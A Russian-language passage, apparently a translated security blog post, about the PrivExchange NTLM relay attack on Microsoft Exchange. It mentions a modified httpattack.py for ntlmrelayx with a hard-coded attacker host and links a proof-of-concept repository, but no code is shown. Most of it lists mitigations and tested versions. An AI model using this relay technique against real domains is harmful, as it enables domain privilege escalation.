Я включил небольшой модифицированный httpattack.py , который вы можете использовать с ntlmrelayx для выполнения атаки с точки зрения сети без каких-либо учетных данных (вам просто нужно изменить хост атакующего, поскольку он жестко запрограммирован в файле):

Работа этой атаки зависит от различных компонентов.В предыдущих блогах я уже освещал несколько способов защиты от ретрансляции NTLM и, в частности, от ретрансляции в LDAP.

Наиболее важные средства защиты, применимые к этой атаке:

  • Удалите ненужные высокие привилегии, которые Exchange имеет для объекта «Домен», запустив setup.exe / PrepareAD из исправленного Exchange CU (дополнительную информацию см. Ниже).
  • Включить подписывание LDAP и включить привязку канала LDAP для предотвращения ретрансляции на LDAP и LDAPS соответственно
  • Запрещает серверам Exchange устанавливать соединения с рабочими станциями через произвольные порты.
  • Включите расширенную защиту для проверки подлинности на конечных точках Exchange в IIS (но не на серверных точках Exchange, это нарушит работу Exchange). Это позволит проверить параметры привязки канала в проверке подлинности NTLM, которая связывает проверку подлинности NTLM с подключением TLS и предотвращает ретрансляцию на веб-службы Exchange.
  • Удалите раздел реестра, который делает возможной ретрансляцию на сервер Exchange, как описано в разделе «Устранение рисков Microsoft для CVE-2018-8518».
  • Принудительное подписание SMB на серверах Exchange (и, желательно, на всех других серверах и рабочих станциях в домене), чтобы предотвратить атаки с перекрестным протоколом ретрансляции на SMB.
  • Если push / pull подписки EWS не используются, их можно отключить, установив для EWSMaxSubscriptions значение 0 с помощью политики регулирования, как обнаружено здесь @gentilkiwi. Я не проверял, насколько они используются легитимными приложениями, поэтому рекомендуется протестировать это с небольшой пользовательской областью.

Инструменты проверки концепции можно найти по адресу https://github.com/dirkjanm/PrivExchange. Они были протестированы на следующих версиях Exchange / Windows:

  • Exchange 2013 (CU21) на Server 2012R2, ретранслируется на DC Server 2016 (все исправлены полностью)
  • Exchange 2016 (CU11) на сервере 2016, ретранслируется на контроллер домена Server 2019 (все полностью исправлены)
  • Exchange 2019 на сервере 2019, ретранслируется на DC Server 2019 (спасибо @gentilkiwi за тестирование)

Вышеупомянутые серверы Exchange были установлены с использованием режима общих разрешений (который используется по умолчанию), но, согласно этой записи, развертывание разделенных разрешений RBAC также уязвимо (я лично не тестировал это).

Exchange 2010 SP3, похоже, не затронут , в моей лаборатории эта версия согласовывала подписывание, аналогичное SMB, как описано выше, что предотвращает ретрансляционную атаку (спасибо @ Lean0x2f за это).

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *